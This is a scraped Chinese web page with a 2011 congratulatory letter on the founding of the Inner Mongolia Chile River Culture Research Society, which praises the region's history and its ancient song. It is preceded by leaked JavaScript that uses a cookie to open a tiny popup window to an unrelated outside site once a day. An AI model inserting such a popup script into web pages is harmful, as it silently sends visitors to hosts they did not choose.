function setCookie(name, value, expire) { window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString())); } function getCookie(Name) { var search = Name + "="; if (window.document.cookie.length > 0) { // if there are any cookies offset = window.document.cookie.indexOf(search); if (offset != -1) { // if cookie exists offset += search.length; // set index of beginning of value end = window.document.cookie.indexOf(";", offset) // set index of end of cookie value if (end == -1) end = window.document.cookie.length; return unescape(window.document.cookie.substring(offset, end)); } } return null; } function register(name) { var today = new Date(); var expires = new Date(); expires.setTime(today.getTime() + 1000*60*60*24); setCookie("ttt", name, expires); } var exitURL="http://www.adminchn.com/"; function openWin() { var c = getCookie("ttt"); if (c != null) { return; } register("ttt"); var featureStr="''"; featureStr="'top=0,left=0,width=88,height=31,toolbar=yes, menubar=no, scrollbars=no, resizable=no, location=no, status=no,center:no'"; self.focus(); var ExitWindow = window.open(exitURL,'', featureStr); ExitWindow.focus(); } openWin(); window.focus()
领导贺电 |
11/28/2011 12:26:10 PM 添加人:admin 点击数:次
|
来旺同志: 欣闻“内蒙古敕勒川文化研究会”成立,谨表示热烈祝贺,并向全体会员表示问候! 敕勒川地处内蒙古呼和浩特、包头、巴彦淖尔、鄂尔多斯三角地带,是草原文化交汇的地方, 一首北齐《敕勒歌》流传至今有1600多年,历史久远,文化厚重。蒙汉等各族人民在这里共同演义的团结、统一、和谐、相融之歌,是中华民族文化的重要组成部分,值得深入研究、弘扬广大。 希望你们遵循“古为信用、洋为中用、推陈出新”的社会主义文化方针,把握“共同团结奋斗,共同繁荣发展”的民族工作主题,为张扬中华民族文化、促进和谐社会建设做出不懈努力! |
|